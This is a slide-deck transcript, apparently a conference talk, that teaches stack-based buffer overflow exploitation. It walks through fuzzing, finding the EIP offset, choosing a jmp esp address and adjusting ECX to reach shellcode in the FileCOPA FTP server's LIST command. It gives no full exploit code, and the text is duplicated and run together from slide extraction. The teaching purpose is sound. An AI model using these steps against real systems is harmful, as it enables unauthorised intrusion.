software exploitation techniques by amit malik
Post on 29-Nov-2014
2.392 Views
Preview:
DESCRIPTION
TRANSCRIPT
Presented By:Amit Malik
a.k.a DouBle_Zer0m.amit30@gmail.com
Application overview
Debuggers
Stack based buffer overflow
Demo
Filecopa FTP (File Transfer Protocol) server
Port 21
Vulnerable to buffer overflow
All time favorite ollydbg
Why debuggers ?
Breakpoints
Immunity Debugger
Others
Discovered in 1972. Computer Security
Planning Study.
Exploited in 1988. Morris Worm.
Published in Phrack in 1994. Aleph One.
“Smashing the stack for fun and profit.”
Each function creates its own stack. Caller function stack: known as parent stack. Called function stack: known as child stack.For e.g.
main(){ ASM Pseudo: sum(); _main:
} 123: push ebp 124: mov ebp,esp
125: sub esp,val 126: call _sum 127: mov esp,ebp
128: pop ebp 129: ret
123: push ebp 124: mov ebp,esp125: sub esp,val126: call _sum127: mov esp,ebp128: pop ebp129: ret
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
Ret(127)Ret(127)
ebpebp
Locals sum()Locals sum()
Unallocated spaceUnallocated space
StackGrowt
h
123: push ebp 124: mov ebp,esp125: sub esp,val126: call _sum127: mov esp,ebp128: pop ebp129: ret
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
Ret(127)Ret(127)
ebpebp
Locals sum()Locals sum()
Unallocated spaceUnallocated space
StackGrowt
h
123: push ebp 124: mov ebp,esp125: sub esp,val126: call _sum127: mov esp,ebp128: pop ebp129: ret
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
Ret(127)Ret(127)
ebpebp
Locals sum()Locals sum()
Unallocated spaceUnallocated space
StackGrowt
h
if the input for localvariables is greater than
thespace allocated tothem..Then……….
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
Ret(127)Ret(127)
ebpebp
Locals sum()Locals sum()
Unallocated spaceUnallocated space
StackGrowt
h
it will overwrite ret(saved EIP)
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
AAAAAAAA
AAAAAAAA
AAAAAAAAAAAA…AAAAAAAAAAAA…
Unallocated spaceUnallocated space
StackGrowt
h
Ret startup()
Ret startup()
ebpebp
Locals main()Locals main()
jmp espjmp esp
AAAAAAAA
AAAAAAAAAAAA…AAAAAAAAAAAA…
Unallocated spaceUnallocated space
BeforeBefore AfterAfter
Vulnerable to Buffer Overflow (LIST
command)
But how we know that server is vulnerable ?
Three methods to find out security bugs.
1.Fuzzing
2.Reverse Engineering
3.Source Code Auditing
Fuzzing - Send invalid, unexpected, or
random data to the inputs of a program. If
the program fails/crash, the defects can be
noted.
Ok lets send invalid input to our server.
Still listening ? Umm no..gud.
But we don’t know which function is causing
this problem.
Reverse engineering – is the process of
analyzing a subject system to create
representations of the system at a higher
level of abstraction.
Generally used after Fuzzing.
Provide in-depth information about target.
Sometimes more than source code.
Calculate offset for EIP.
ESP is pointing to our buffer.
Aahhh.. problem we don’t have much space
on stack (only 13-14 bytes approx.).
Now what ?? Check other registers.
ECX is pointing but not directly.
But we have some bytes on stack. Use these
bytes to adjust ecx and then jump to ecx.
We need a jmp esp (address) first.
Note: hard coding the stack address is not a
good practice. Contains null bytes, address
may change.
Search the address in DLLs. Because DLLs
are static at least for same service packs.
ECX is at 00652984 but our data is at 006529cc (on my system).
Increase ECX, but a little problem that data is used to overwrite EIP.
So increasing ECX to that address gives little space (only 234 bytes approx.)
So increase ECX, that will jump over saved EIP.
So add ecx,152 bytes. Does it work ??
Nop.. It generate null bytes, can’t use.
Ok add cx,152 bytes.. Should work. Else
increase bytes.
Now jump to ecx. (instruction). And we have our hellcode ready.
top related